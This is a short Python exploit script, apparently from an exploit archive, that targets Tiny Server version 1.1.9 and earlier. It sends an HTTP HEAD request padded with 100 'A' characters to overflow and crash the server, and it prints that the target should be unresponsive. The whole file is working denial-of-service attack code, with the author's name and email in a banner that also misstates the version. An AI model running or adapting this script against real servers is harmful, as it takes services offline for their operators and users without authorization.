#!/usr/bin/python ############################################################################### # Overflow exploiting a vulnerability in Tiny Server <=1.1.9 (HTTP) HEAD request. # Date of Discovery: 3/19/2012 (0 Day) # Author: Brock Haun # Vulnerable Software Download: http://tinyserver.sourceforge.net/tinyserver_full.zip # Software Version: <=1.1.9 # Target OS: Windows (Tested on Windows 7) ############################################################################### import httplib,sys if (len(sys.argv) != 3): print '\n\t[*]Usage: ./' + sys.argv[0] + ' ' sys.exit() host = sys.argv[1] port = sys.argv[2] buffer = 'A' * 100 + 'HTTP/1.0\r\n' print '\n[*]*************************************************' print '[*] Tiny Server <= 1.1.0(HTTP) HEAD request overflow' print '[*] Written by Brock Haun' print '[*] security.brockhaun@gmail.com' print '[*]*************************************************\n' try: print '\n\t[*] Attempting connection.' httpServ = httplib.HTTPConnection(host , port) httpServ.connect() print '\n\t[*] Connected.' print '\n\t[*] Sending crash buffer.' httpServ.request('HEAD' , buffer) print '\n\t[*] Done! Target should be unresponsive!' except: print '\n\t[***] Connection error. Something went wrong. :(' httpServ.close() sys.exit()